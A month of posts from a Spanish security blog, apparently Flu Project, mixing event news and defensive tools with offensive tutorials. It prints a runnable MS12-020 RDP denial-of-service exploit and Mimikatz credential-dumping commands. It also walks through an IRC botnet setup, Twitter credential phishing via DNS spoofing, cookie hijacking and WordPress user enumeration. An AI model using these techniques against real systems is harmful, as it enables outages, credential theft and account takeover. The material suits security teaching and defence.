31 mar 2012

En memoria de Hugo Castellano

Buenas a todos, hace unos dias tuvimos la desgracia de perder a Hugo Castellano, me enteraba como muchos supongo por el triste artículo de Chema en su blog.

Hugo fue uno de los mayores motores del congreso NoConName, siempre bajo el telón, con su boina y su gran experiencia moviendo masas (como el mismo nos contaba entre las muchas historias que tuvimos el placer de escuchar de sus labios en las pasadas NcN2k11 y Rooted2012). En esta primera fue donde Pablo y yo tuvimos el placer de conocerle por primera vez. Nos presentó Nico, una hora antes de nuestra ponencia sobre "Técnicas Oscuras para combatir la pederastia en Internet", y compartimos un café mientras hacíamos tiempo a que empezase la charla. Era mi primera vez en una grande como NcN, y Hugo no dudó en darnos algunos consejos y compartir su punto de vista sobre la compleja temática que ibamos a tratar.

Al salir de la charla nos quedamos más de una hora charlando con él y con silverhack sobre el tema, no dudó en comentarnos lo que le encantó de la charla y lo que menos le gustó y nos dio muchos consejos para próximas CONs, que llevo grabados a fuego y que ya he puesto en práctica en los siguientes eventos a los que me he ido enfrentando.

Tras ese día he mantenido varias charlas con Nico y con Hugo, la última en la pasada Rooted. Hugo siempre tenía una buena palabra, crítico y sagaz, siempre aportaba buenas ideas para construir cosas más grandes, como comentaba en el panel de la Rooted al que fueron invitados como organización de NcN.

Una gran pena la pérdida, pero esperamos que estas lineas sirvan para recordar a Hugo como se merece.

Un abrazo y hasta siempre

30 mar 2012

El Sticky Keys (sethc.exe) de GNU/Linux

¿Quién no conoce ya el proceso del famoso Sticky Keys para saltarse una pantalla de login? Si bien hay que decir que se puede proteger al sistema contra este tipo de ataques, también hay que recordar que si se dispone de acceso físico a la máquina, la cosa pinta mal...

En GNU/Linux no se libran de un proceso similar, más bien similar por el objetivo y consecuencia, pero no en su precondición. El objetivo es ver si una máquina Linux dispone de un grub editable, y cambiar el boot para que se devuelva una shell, por ejemplo bash, y de este modo disponer de una shell de root por las buenas. Podéis pensar, ¿cómo va a funcionar eso? es una locura, ¡Linux es seguro! !no existe malware! y otros tópicos del montón...

Frente a frente con la bestia

Nos encontramos con un Linux, como diría Jhonny Face To Face, y nos preguntamos ¿me dejará editar el grub? Por defecto, en ciertas distribuciones si, y en otras podemos indicarle parámetros de booteo directamente... benne benne. Al arrancar la máquina nos encontramos con el grub, pulsando la tecla e, por ejemplo en ubuntu, se puede editar. Entonces, si me dejan editarlo... habrá que aprovecharlo.

En la línea dónde se llama a la imagen del kernel que se va a cargar y la partición y usuario con la que se arrancará el sistema se debe modificar de la siguiente manera:

Ahora, tecla F10, lanzamos el booteo y... si... una shell como root, para lo que quieras...

Bueno pues esto es todos por hoy... para quién no conociese esta técnica comentar que no es una vulnerabilidad, al igual que el sticky no lo es en Windows, solo es una mala configuración de las muchas que se pueden encontrar en las aplicaciones por defecto, así que cuidar vuestras configuraciones por defecto ;)

29 mar 2012

Recuperando contraseñas de Windows en texto plano (I de II)

 

Buenas a todos, en los últimos meses se ha hablado mucho de la herramienta Mimikatz desarrollada por gentilkiwi (en idioma francés). Esta utilidad permite recuperar credenciales en claro de un equipo Windows, para ello necesita permisos de debug (para el proceso LSASS, os suena de Pass The Hash ¿verdad?).

Mimikatz se aprovecha de que los proveedores de servicios Tspkg y Wdigest almacenan en memoria las credenciales de todos los usuarios que se hayan autenticado en el sistema, tanto en local como a través de escritorio remoto. Sí que es verdad que no las almacena en claro, pero si de una manera reversible.

Para ejecutar esta aplicación con los permisos suficientes (en caso de que no los tuviésemos) nada como tirar de nuestras queridas Sticky Keys y un Live CD de Linux.

Ya con un usuario administrador podremos proceder sin problemas a la extracción de las credenciales de la máquina.

Una vez autenticados con un usuario administrador, copiaremos Mimikatz al equipo (no necesita instalación). Al abrirlo deberéis ejecutar el archivo  mimikatz.exe.

Una vez dentro, se abre un prompt en el que introduciremos los 3 siguientes comandos:

  • privilege::debug
  • inject::process lsass.exe sekurlsa.dll
  • @getLogonPasswords

 

Y eso es todo, obtendremos el usuario y contraseña en claro.

Fácil, sencillo y... otra herramienta de botón gordo para nuestro arsenal.

Nos vemos en el próximo post, saludos!

 

28 mar 2012

Begoña Merino entrevista a Flu Project

El pasado mes de diciembre tuve el gusto de impartir en nombre de Flu Project un taller para cuerpos policiales en la localidad de Malgrat de Mar (Barcelona) titulado "El lado oscuro de la red". Una experiencia muy gratificante en la que pude compartir ideas y conocimientos con grandes profesionales. Unos dias después, se puso en contacto con nosotros la periodista Begoña Merino, para entrevistarnos sobre la temática de la ciberseguridad y los crímenes en la red para la publicación de su artículo "En guardia frente al ciberdelito".

Os dejamos con una breve mención a su interesante artículo:

“En una tarde es fácil encontrar en la red las instrucciones para cometer un cibercrimen, y no hace falta ser un experto”, dice Núria Mas, de 3enraya Informàtics, organizadores del curso de formación en cibercrimen, hacking y seguridad informática puesto en marcha en colaboración con la International Police Association, la Policía Local de Malgrat de Mar, Evidentia Investigación Digital, Consulting Group y el Máster en Criminalística de la Universidad Autónoma de Barcelona. Según el estudio Ciberdelitos: el impacto humano, publicado por la compañía Norton el pasado año, el 65% de los adultos de todo el mundo fueron víctimas de un ciberdelito.La matriculación en el curso está restringida a cuerpos de seguridad y juristas. Entre otras habilidades, los asistentes aprenden técnicas de hacking ético o hacking puesto al servicio de una buena causa, en este caso, cómo utilizar un virus informático para neutralizar el anonimato tras el que actúan los acosadores sexuales a menores en la red y poder detenerlos. El ponente de este módulo, Juan Antonio Calles, es creador de Flu Project junto con Pablo González y ha prestado su apoyo técnico en operaciones de hacking ético a la policía colombiana que llevaron a la identificación del acosador de una menor de 14 años.Pero el cibergrooming, que es como se conoce la práctica de acoso sexual online a menores, es solo uno de los muchos cibercrímenes a los que está expuesto cualquier usuario de Internet. La red es en este momento una especie de salvaje Oeste por el que campan todo tipo de amenazas: actividades de piratas informáticos, ciberacosadores, mafias organizadas que venden redes de ordenadores zombis y software de encargo para delincuentes, ciberguerras, virus que toman el control del ordenador, códigos informáticos maliciosos, fraudes en ventas en línea, robo de contraseñas, venta por lotes de tarjetas de crédito robadas, apropiación de identidades en redes sociales, acosadores sexuales, fraudes online con tarjetas de crédito, estafas como las loterías online, ofertas de empleo fraudulentas,phishing… y todo lo que da de sí la imaginación del delincuente y la ingenuidad del usuario desprevenido.

Podéis acceder al articulo online completo desde el siguiente enlace:

http://www.tecnicaindustrial.es/TIFrontal/a-4627-En-guardia-frente-ciberdelito.aspx

O descargar la versión PDF desde este otro enlace:

http://www.tecnicaindustrial.es/TIAdmin/Numeros/82/1608/a1608.pdf

Saludos!

27 mar 2012

Marmita – Detectando ataques man in the middle

Hola!

Muy buenas a todos/as!

Los ataques man in the middle dan mucho juego a  la hora de poder realizar muchos ataques. Desde simplemente hacer un man in the middle para ver que peticiones realiza un cliente. Además otras técnicas se basan en la idea de un man in the middle, por ejemplo cuando ciertos troyanos realizan los ataques MITB, es decir, cuando infectan la máquina son capaces de modificar las páginas webs que recibe el navegador de la víctima.

En este esquema podemos ver como actúa un ataque man in the middle:

En el primer esquema, tenemos una red LAN, en la cual tenemos dos usuarios. El usuario Devil User intentará hacer un ataque de man in the middle al otro user. SI consiguiera perpetuar el ataque, el esquema podría quedar así.

Para detectar estos tipos de ataque en la LAN podemos usar varios métodos, uno de ellos es el software Marmita.

Marmita se encarga de monitorizar el HOST por si es atacado por un ataque man in the middle.

Para descargar Marmita podemos hacerlo desde aquí

Como requisito, has de tener instalado Winpcap

La herramienta tiene este aspecto:

La herramienta ofrece varias opciones, por ejemplo el de empezar la detección, nada mas iniciar el sistema operativo, que es lo interesante.

Marmita tiene este aspecto:

La herramienta es bastante intuitiva y podemos rápidamente acceder a la información que nos interesa directamente.

Por ejemplo la información de la tabla ARP

Cuando Marmita detecte el ataque man in the middle arrojará un aviso bastante claro, además de un globito de notificación.

Marmita intentará identificar quien está haciendo el ataque Man in the middle, este ataque quedará registrado en los logs, para poder consultar mas tarde.

Marmita tiene una pestaña de histórico de ataques, donde podremos consultar el historial. En este historial sale reflejada la hora, la MAC, el tipo de ataque, el nombre del atacante…

Además, si recordamos la primera imagen donde salian las preferencias de Marmita, existe una de que Marmita pueda mitigar los ataques man in the middle. En este caso observamos como Marmita detecta el ataque ARP Poisoning.

Sin duda es una herramienta que puede ser muy útil para tu sistema Windows, te animo a probarla!

Saludos

26 mar 2012

Redes botnet. Controlando una botnet por irc (Parte II)

En esta segunda entrega presentaré un ejemplo de la creación, configuración y funcionamiento de una red botnet, pero en un entorno controlado. Para la implementación de esta práctica se usó el bot ruso llamado Illusion, el cual tiene como fin principal la realización de ataques de negación de servicios, y permite ser controlado tanto por irc como por http. Para este ejemplo el control se hará por medio de irc.

Para no hacer esta entrada más extensa, solo mostraré las configuraciones de este bot y algunas de sus funciones. Partiremos del hecho de que tenemos:

  • Un servidor IRC en una de nuestras máquinas, con un canal de chat, en donde se llevará a cabo el control de las máquinas zombie a través del envió de comandos.
  • Un cliente IRC que permitirá la comunicación con el bot, logrando el envió de instrucciones por medio del canal de chat creado anteriormente. Este cliente se configura con los datos del dueño de la Botnet, como el alias, el servidor Irc y el puerto.

Configuración del Bot

El software usado para la creación de esta red Botnet es el denominado Illusion en su versión 1.1.

Los pasos para su configuración son los siguientes:

  • Luego de descomprimido el archivo se pulsa sobre el icono de nombre Build y se presiona el botón Edit Binary.

image

  • A continuación, se seleccionará el bot para su edición, en este caso es BOTBINARY.
  • Realizado esto se ingresarán los datos de configuración del bot. Este soporta dos servidores IRC; como solo hay uno se escribió la dirección de este en ambos puntos, acompañado del número de puerto, y el nombre del canal por el conectará y recibirá las ordenes del dueño de la botnet. Para guardar los cambios se presiona en save y este actualiza el botbinary con los nuevos datos y queda listo para la propagación. Este instalador es el que se va a ejecutar en la máquina víctima.

image

Controlando la máquina zombie desde el canal Irc

Después de haber infectado la máquina, el bot se conectará al canal Irc creado, en espera de las ordenes del herder como se muestra a continuación.

image

Teniendo al drone en el canal, se procederá a iniciar sesión como dueño de la botnet, para que este responda a nuestras peticiones. Para ello se usa el comando login acompañado de la contraseña que se le configuró como Bot Password.

image

Si desea conocer todos los comandos disponibles para controlar esta botnet podrá visitar el siguiente sitio http://troyanosyvirus.com.ar/2006/07/comandos-illusion-bot.html, o mirar dentro de la carpeta de descarga de este. Solo expondré un ejemplo de alguno de ellos, ya que el objetivo de este escrito no es ser un manual, sino servir de práctica para observar el funcionamiento de una botnet y ver lo sencillo que es crearla.

  • sinfo: muestrará datos relacionados del sistema.

image

  • ftpd [port]: Permitirá realizar una conexión ftp por el puerto indicado.

image

En la ventana de inicio de la aplicación, se introducirá en la casilla de Servidor la ip de la máquina zombie; en nombre de usuario, la contraseña con las que el bot nos identificará como amo, y finalmente se introducirá el puerto.

image

  • synflood: este ataque se caracteriza por intentar realizar un gran número de conexiones Tcp con la bandera Syn activa, haciendo que la máquina víctima responda con un Syn/ack y quede aguardando una respuesta Ack que nunca es enviada. Esto ocasiona que se consuman recursos en la espera y que se acumulen las peticiones en cola, hasta que se dé una negación de servicios.

image

  • bindport [port], este comando permitirá que una Shell se conecte al puerto especificado.

image

Se establece una conexión indicándole a netcat la ip del equipo zombie y el puerto que está en escucha.

image

Este bot, es bastante antiguo, y es detectado por todos los antivirus. Además existen otros medios más eficientes de tomar control, a parte del irc. La idea de este artículo es dar un pequeño ejemplo de la creación y lo peligroso que puede ser caer en una red botnet.

¡Saludos!

25 mar 2012

Informe Flu - 64

Comenzamos con el resumen de la semana:

Lunes 19 de Marzo

Martes 20 de Marzo

Miércoles 21 de Marzo

Jueves 22 de Marzo

Viernes 23 de Marzo

  • El viernes publicamos una nueva viñeta de humor, parodiando el mítico video en el que salían dos hermosas mujeres disfrutando de una taza de café y al que hemos titulado "2 Woman, 1 Hack" :) Las viñetas de Flu Project – 9

Sábado 24 de Marzo

  • Publicamos una nueva entrega de Pantalla Pública, con 3 nuevos cazados de cines, estaciones de metro y centros comerciales, ¡no os los perdáis!

24 mar 2012

Pantalla Pública VIII

Buenas a todos, volvemos a la carga con tres nuevas pantallas públicas que nos habéis enviado a nuestro email info@flu-project.com, ¡gracias!

La primera nos la envía nuestro amigo $DoC, os dejamos con su mensaje:

Os dejo esta pantalla pública... Es de "decathlon"... Una pantalla táctil para hacer tú el pago del producto (luego dicen que no hay trabajo, normal!). Con un poco de magia puede entrar en el entorno gráfico jeje.

 

La siguiente pantalla pública nos la envía de nuevo Joaquin Garreta, pero esta vez deja la bici para subirse al metro de Barcelona, ¡gracias!

El último cazado del día nos lo envía nuestro blogger Hecky, disfrutando del cine... }:-)

23 mar 2012

Las viñetas de Flu Project – 9

Buenas a todos, hoy viernes volvemos a la carga con una viñeta de humor en Flu Project, en este caso hemos querido plasmar una broma que tengo con algunos compañeros de trabajo sobre el "mítico video", que creo no hará falta referenciar. Le hemos añadido nuestro toque haxor con una referencia al genial libro de Metasploit "The penetration tester's guide".

¡Disfrutarla!

Post dedicado a Mario ;)

22 mar 2012

Cosas que hacer en la biblioteca (URJC Tech Fest): Hijacking To Portal

En el congreso de la URJC Tech Fest, en el que Flu Project volvió a casa, se demostró una prueba de concepto de lo fácil que es realizar un Hijacking a una sesión de, un alumno, profesor, o miembro laboral de la Universidad, los cuales dispongan de cuenta en el portal de servicios. En primer lugar abarcaremos cual es el problema y como se logra acceder a la cookie y la posible suplantación, para después ver como uno se puede proteger de las andanzas de los jóvenes e inquietos estudiantes de la URJC y lo que pueden llevar a cabo en la biblioteca.

Ah... ¿Pero qué no solo se va a estudiar a la biblioteca?

Por lo que se vió en el congreso no sólo de estudio vive el estudiante, en la biblioteca de la URJC se hace de todo, relaciones personales, importantes en la vida, y sobretodo mucho cesped... y luego hay jóvenes que pueden ver la WiFi como un campo de batalla sobre el que experimentar, siempre sobre sus recursos y máquinas y nunca sobre los demás... nunca... ;)

Cogiendo la Cookie

Si fuéramos argentinos la frase 'cogiendo la cookie' significaría... 'foll... la cookie' pero este no es el ámbito, a lo que nos referimos es como capturar una cookie de sesión del portal de la URJC. Para ello se demostró que utilizando un arp-spoofing o más conocido como Man In The Middle o MITM, el cual ha sido tratado en Flu Project en diversas ocasiones, se consigue que el tráfico de la víctima pase por nosotros. Este artículo no pretende volver a explicar el MITM, ni incluso la suplantación de cookie, pero si enseñar que fácil puede llegar a ser, y la pregunta es ¿Por qué no lo corrigen? Les ayudaremos a ello, y sobretodo al usuario de la biblioteca a protegerse un poco más.

En primer lugar, ¿Cómo me protejo del MITM? Bueno, pues podemos utilizar un script que detecte cambios en la tabla arp. De esto también hemos hablado con anterioridad, por lo que enlace al canto sobre la detección de MITM. Pero, si no tenemos maña con los scripts, que me lo den hecho, y para ello disponemos de la Marmita, si no la has probado... ¡pruebala!

Una vez hago el MITM...

Una vez hecho el MITM y se consigue que el tráfico de la víctima, que claramente somos nosotros mismos, porque esto es una PoC, que nadie se enoje... :O abrimos el Wireshark, el paratodo de redes, el analizador por excelencia. El filtro que le aplicamos es http contains "Cookie" && http contains "miportal.urjc.es". El filtro es importante que se entienda, se filtra tráfico http y que, en primer lugar, contenga la palabra Cookie, importante la C en mayúscula, y en segundo lugar, que ese tráfico a la vez contenga la palabra miportal...blabla.

Una vez se localiza la Cookie, hay que tener en cuenta que la IP debe ser la víctima, es decir nosotros recordarlo siemrpe eh! ajajaja. El caso, que copiamos el valor de la cookie y la llevamos a un bloc de notas. Toca estudiar que cosas más bonitas esos parámetros que nos identifican de cara a un servidor. Bueno, habrá que ir probando a ver qué parámetros son los necesarios para suplantar la cookie... tras un largo estudio, el joven inquieto se da cuenta de que, ORA_WX_no se qué y algo de un portal son necesarios, bueno, lo único necesario...

Aplicando cambios en un plugin como Cookies Manager+

Bueno, pues el plugin elegido es Cookies Manager+, un plugin que permite crear cookies y configurarlas... por lo que si se tienen los parámetros, solo hay que crear la cookie... y listo. Una vez creada la cookie, hay que proporcionar el recurso al que se quiere entrar. En el navegador simplemente, hay que indicar a la web que se quiere entrar. El recurso no será la web pública, si no la privada de inicio, es decir, la URL a la que accede un usuario tras loguearse.

¿Así de fácil? Como se pudo ver en la PoC del congreso si... ¡Pero bueno! ¿algo se podrá hacer no? Em... si, bueno, anteriormente hemos comentado como intentar evitar el MITM, pero y si no nos damos cuenta del MITM, disponemos de varios plugin que lo que intentan es forzar la conexión HTTPS. El problema está en que se fortalece el login del portal de usuarios de la Universidad, pero una vez logueado, la conexión baja a HTTP, por lo que el contenido va sin cifrar... Entonces, la cookie puede ser capturada. ¿Por qué no dejan la conexión siempre bajo HTTPS? Eso arreglaría bastante el problema, aunque cuidado que hay otro tipo de ataques, como por ejemplo, SSL Strip que también nos podría dar un quebradero de cabeza...

Plugin: ForceTLS

Ayuda a proteger siempre conectándose por HTTPS, pero claro si el servidor no da servicio por HTTPS no obra el milagro, por lo que sólo si se puede acceder por HTTPS se accederá si no... NO! Lo que parece que ForceTLS logra parcialmente, o al menos lo intenta... pero viendo la información que proporciona el navegador, no parece que haya una conexión segura, aunque intentemos conseguirla... podréis utilizar ForceTLS correctamente con facebook por ejemplo... tuenti tampoco aporta el HTTPS en su sesión una vez logueado.

Y por último vemos como no... no conseguimos el HTTPS dentro de la sesión...

¿Entonces qué?

Protegeros en las tierras de batalla que es la WiFI, ¡protegeros! y usad el sentido común. Recordad que no está bien utilizar dichas técnicas para sacar algún teléfono de la chica que te gusta, y ni mucho menos, para espiar sus conversaciones, en este blog sólo hablamos de pruebas de concepto y no hay nada más lejos de la realidad. Sed buenos, y con vuestros compañeros también... Todos somos Laura, todos somos Carlos...

21 mar 2012

Enumerando usuarios de Wordpress con W3af

Buenas a todos, cuando nos toca auditar un wordpress uno de los apartados en los que se suele hacer hincapié suele ser en el portal de login, donde se realizarían ataques de fuerza bruta debido a que Wordpress, por defecto, no limita el número de autenticaciones fallidas, ni bloquea usuarios. Hoy no voy a hablar de como atacar por fuerza bruta un login de wordpress, para eso os dejo por ejemplo con éste script, ni de como protegerlo, aunque sí que os dejaré un plugin que podría ayudaros: Limit Login Attempts. Hoy os hablaré de una de las pruebas que puede lanzar la herramienta W3af, el listado de usuarios, y que nos será de gran utilidad a la hora de realizar los ataques de fuerza bruta.

Para enumerar los usuarios de un wordpress tendremos que hacer uso de la opción "wordpress_enumerate_users" de W3af:

Una vez seleccionada la opción, simplemente introducís el blog que deseais escanear y pulsáis en "Start", inmediatamente en el apartado "log" se os mostrarán los usuarios registrados como "information" (si es posible):

Ya tenéis usuarios para realizar ataques de fuerza bruta. Ahora podréis utilizar el script que os dejé al principio del post, o éste plugin para metasploit, y comenzar a "bruteforcear" el apartado de login con un buen diccionario.

saludos!

20 mar 2012

Jugando con Ettercap (parte 2 de 3)

Muy buenas! Hoy vamos a explicar una de las muchas maneras de las que podemos aprovechar el plugin dns spoof. En concreto usaremos SET (Social Engine Toolkit), clonando la web de twitter y robando credenciales.

Para empezar, abriremos una nueva ventana del terminal y ejecutamos SET.

“cd /pentest/exploits/SET”

“./set”

Suponiendo que tenemos la aplicación actualizada, escogemos la segunda opción, ataques web.

En este segundo menú, podremos escoger entre una amplia gama de opciones, en lo personal acostumbro a usar el Multi-Attack Web Method ya que da muchísimo juego, aunque en esta ocasión la opción escogida es la 3, Ataque de credenciales.

Ahora simplemente debemos introducir la web a clonar, en nuestro caso twitter. (Recordar hacer el registro dns de la web y nuestra ip en el archivo etter.dns como vimos en el primer artículo).

Una vez introducida, solo quedará esperar a que cualquier equipo de la red haga la petición dns de twitter.com y nuestra máquina la responderá con la falsa ip en lugar de la del servidor legítimo.

Recordad que, si el equipo cliente tiene almacenada en caché la información de la consulta dns no surgirá efecto, por lo que os recomiendo al hacer las pruebas, borrar la chaché dns “ipconfig /flushdns” y los datos del navegador, por si acaso.

En la última entrega sobre ettercap, trataremos la opción de aplicar filtros, para modificar los paquetes. Cambio de imágenes, palabras, redirecciones, etc.

Dicho esto,  a disfrutar!

19 mar 2012

Exploit para la vulnerabilidad en RDP de Microsoft (MS12-020)

Hola!

Muy buenas a todos/as!

Hace unos días salió la noticia de un fallo en el RDP de Microsoft.

Este fallo, es explotable, Microsoft ya publicó en marzo el boletín MS12-020 que soluciona los errores en RDP que habían sido puestos en su conocimiento a través de fuentes privadas.

Ya hay varios Pastebin con el código explotable para la vulnerabiliad, podemos ver el resumen de la vulnerabilidad aquí.

De los múltiples exploits que me he encontrado he hecho la prueba con uno de ellos.

Lo he probado contra una máquina Windows XP SP3

El código del exploit:

# ms12-020 smaller# I reduced the needed payload to DOS, the crashed is caused by buf2# bp RDPWD!NM_Disconnect // crash is after this## freenode #ms12-020import socketimport sysimport time#initbuf0 = “030000130ee000000000000100080000000000″.decode(‘hex’)#MCS: Connection-initialbuf1 = “030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0″.decode(‘hex’)#payloadbuf2 = “0300000802f08028″.decode(‘hex’)package = buf0+buf1+buf2HOST = sys.argv[1]PORT = 3389for i in range(10000):print is = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.settimeout(3)s.connect((HOST,PORT))try:s.send(package)rec = s.recv(1024)except:passs.close()

Al ejecutarlo la máquina Windows remota se reinicia.

En el enlace anterior sobre la información de la vulnerabilidad podréis encontrar los parches correspondientes.

Saludos!

18 mar 2012

Informe Flu - 63

Comenzamos con el resumen de la semana:

Lunes 12 de Marzo

Martes 13 de Marzo

Miércoles 14 de Marzo

  • El miércoles volvimos a casa, volvimos a la URJC para dar dos ponencias en el #URJC Tech Fest 2012: Flu vuelve a casa. El congreso ha sido muy divertido, con ponencias muy buenas con temáticas que van desde la seguridad informática, a la robótica o la computación móvil.

Jueves 15 de Marzo

Viernes 16 de Marzo

  • El viernes publicamos las diapositivas de nuestra ponencia del jueves en el Urjc Technology Fest sobre "Cosas que hacer en la biblioteca". En la charla tratamos temas como sniffing, spoofing, mitm, ssl strip, hijacking, malware para android, una hora contundente y que gustó mucho a los asistentes :)

Sábado 17 de Marzo

  • Publicamos una nueva entrega de Pantalla Pública, con 3 nuevos cazados muy curiosos, ¡no os los perdáis!

17 mar 2012

Pantalla Pública VII

Buenas a todos, volvemos a la carga con tres nuevas pantallas públicas que nos habéis enviado a nuestro email info@flu-project.com, ¡gracias!

La primera nos la envía nuestro amigo Isaac Castro (@IsaacCF) desde Santiago, os dejamos con su comentario:

Ahí os va una pantalla del Aeropuerto de Santiago de Compostela el día que nos fuimos para la RootedCon, con su bonita barra de Windows, su bonito programa de HP Support por la esquina inferior derecha, y como bonus una de las pantallas rota/apagada ;) Un saludo!

 La siguiente pantalla pública nos la envía Joaquin Garreta del Bicing de Barcelona, ¡gracias!

Los últimos cazados del día nos los envía Edu Bayon desde pucela, ¡disfrutadlos!

16 mar 2012

Diapositivas de la charla "Cosas que hacer en la biblioteca" del #Urjc Technology Fest

Buenas a todos, el miércoles y jueves tuvimos el placer de volver a la Universidad Rey Juan Carlos para dar dos ponencias en el Urjc Technology Festival. Aprovechamos para felicitar a la organización por el gran trabajo que han hecho con el congreso y por invitarnos a participar en él.

A continuación os dejamos con las diapositivas de la charla que dimos ayer sobre "Cosas que hacer en la biblioteca", en la que dimos en repaso general a las técnicas de Sniffing, Spoofing, MITM, SSL Strip, Hijacking, y charlamos un rato sobre malware para Android y el futuro Flu b0.5. Esperamos pronto poder colgaros un video de la ponencia.

Disfrutadlas!

15 mar 2012

SSLCop 1.0, dale caña a las CA

Hola!

Muy buenas a todos/as!

Cuando trabajamos con el sistema operativo accedemos a diversas webs, hay muchas de ellas a las que accedemos mediante HTTPS, me acuerdo cuando en el área de soporte le decías a la persona que te llamaba.

“Si sale el candadito, es que estás seguro/a”

El tema de las CA es un cachondeo sobretodo, porque by default aceptamos varias entitades como confianza.

Esta problemática es la que quiso exponer Yago Jesús en la charla que pudimos ver/oir en la Rooted con.

La charla de Yago Jesús  trataba las siguientes problemáticas:

Problemas relacionados con gestión de certificados SSL (no verificabilidad, falsa sensación de seguridad, fallos en procesos de registro)Problemas relacionados con certificados en formato PKCS#12Problemas relacionados con comunicaciones seguras cifradas (ataques MitM avanzados)Vectores prácticos de ataques a SmartCards (Dni-e)

Junto con la charla, Yago ha desarrollado una herramienta SSLCop que se encarga de bloquear las CA por procedencia.

Aquí tenemos un vistazo a la herramienta

La herramienta ofrece de manera muy fácil el poder bloquear las CA por procedencia geográfica.

Por ejemplo, marcamos todo menos España, y le damos a bloquear

De esta manera tan sencilla podemos bloquear todas las CA, así de fácil.

La pregunta que planteaba Yago en la charla de la Rooted era “¿es necesario que yo, nacido y residente en España, confíe en la CA del gobierno de Japón? más aún ¿En la CA del gobierno Chino o la de Túnez?”

Cada uno es consecuente con lo que hace en Internet, pero si podemos securizarnos un poco mas, mejor que mejor.

Ya han habido problemas relacionados con las CA, Security by Default lo explicaba, por ejemplo en el caso de Comodo, o en el caso de Diginotar.

La herramienta SSLCop la podéis descargar de aquí.

Os animo también a probar dos herramientas mas desarrolladas por Yago,Unhide Patriot.

Saludos

14 mar 2012

#URJC Tech Fest 2012: Flu vuelve a casa

Hoy ha llegado el momento de volver a casa, de volver a los orígenes, eso si… por segunda vez. Hoy comienza el URJC Tech Fest, primer congreso sobre tecnología y seguridad que se realiza en la Universidad Rey Juan Carlos, en el campus de Móstoles.

Las empresas que darán charlas allí son bastante importantes en los distintos ámbitos de la informática. Nos gustará ver a Microsoft, Nokia, IBM, Everis o Informática64 ayudando a los jóvenes estudiantes de la Universidad a emprender un camino con los consejos y principalmente las nuevas tecnologías que llegan. Flu Project por su parte dispone de la suerte de dar 2 charlas, esto se llama enchufe y lo demás es tontería ;) Por un lado, el delegado de la escuela ETSII, nos pidió que diéramos una charla sobre nuestra experiencia laboral y sobre como está el mercado. Esto me pareció de lo más curioso y le dije '¿Qué podemos enseñar nosotros?' A lo cual me dijo 'Me vale con vuestra experiencia', así que intentaremos transmitiros nuestras vivencias lo mejor posible. La charla o si queréis ser mas profesionales, la ponencia, se titula '¿Hay vida después de las aulas?'

Justo después de nuestra primera charla, Miguel Ángel Moreno, nuestro compañero en Flu Project, realizará una charla sobre dispositivos móviles. Es un gran trabajo el que están realizando en el departamento dónde él se encuentra desarrollando e investigando con este tipo de terminales. Recomendamos que asistáis a la charla y especialmente le hagáis muchas preguntas... que le gusta :P. Después, Informática 64 hablará de la FOCA, herramienta de auditoría y pentest, bastante famosa en el sector de la seguridad.

El jueves habrá 2 charlas que nos tocan de cerca, por un lado los compañeros de Juan Antonio, los chicos de Everis. Una empresa importante en el sector de la consultoría, y que tienen un gran acuerdo con la Universidad Rey Juan Carlos, por lo que muchos de sus estudiantes encuentran como primer trabajo a esta gran empresa. Y por otro lado la charla de Carmen Torrano, colaboradora en Flu Project con algún artículo de seguridad, investigadora en el CSIC. Buena amiga mía, y señores informática y guapa, ¡eso no lo veréis mucho en este mundo!

Por último y para finiquitar el congreso, el jueves 15 a las 19:00 tenemos el honor de presentar en casa un taller que tuvo éxito en la Universidad de Santiago de Compostela, entre otros lugares que no pueden ser nombrados... (uhhh :P) El taller se denomina 'Cosas que hacer en la biblioteca', y si... está basado en hechos reales, o no... eso ya cada uno... :O Este taller lo impartirán, en esta ocasión, Juan Antonio Calles y Miguel Ángel Moreno. Pero ellos harán que yo también este presente, y gracias al esfuerzo de los 3 paséis una hora divertida con técnicas hacking. Esperamos que el evento sea grabado y podáis disfrutar de los diversos momentos, y de lo que se enseñe.

Por último recordaros que Flu Project se mantiene gracias al apoyo de la gente, por lo que como diría Florentino, hay que vender camisetas... Llevaremos camisetas y tazas, esperamos que apoyéis el proyecto y adquiráis alguna. Sabemos que sois estudiantes y con la crisis la cosa está muy mala, por eso disponemos del precio estudiante en las camisetas.

Es un honor volver a casa, y esperamos que lo paséis bien.

P.D. Os adjunto los horarios...

 Miércoles 14

09:00-09:30Registro y Documentación
09:30-10:00 Acto de Apertura
10:00-11:00  Microsoft - Ponencia de Azure
11:00-12:00NOKIA - Windows Phone 7
12:00-12:30DESCANSO
12:30-14:00Grupo  Investigación Gavab-CapoCharla + Exhibición con Kinect  
14:00-16:00COMIDA
16:00-17:00Flu Project - ¿Hay vida después de las aulas?
17:00-18:00Diseño Aplicaciones Móviles y Accesibilidad DTE-URJC
18:00-18:30DESCANSO
18:30-19:30 Informática 64 - Pentesting driven by FOCA

 Jueves 15

 09:15-10:00Registro y Documentación  
 10:00-11:00  IBM- Las cuatro tecnologías que cambiarán el mundo
 11:00-12:00 Everis - El Mundo de la Consultoría
 12:00-12:30 DESCANSO
 12:30-13:30Carmen Torrano - "Investigadora del CSIC"
 13:30-14:30 Grupo Investigación de Robótica
 14:30-16:00  COMIDA
 16:00-17:30  Postgrados ETSII
 17:30-18:00 DESCANSO
 18:00-18:30 Grupo Investigación FRAV
 18:30-19:00Grupo Investigación LITE
 19:00-20:00 Taller de Seguridad Flu Project Cosas que hacer en la biblioteca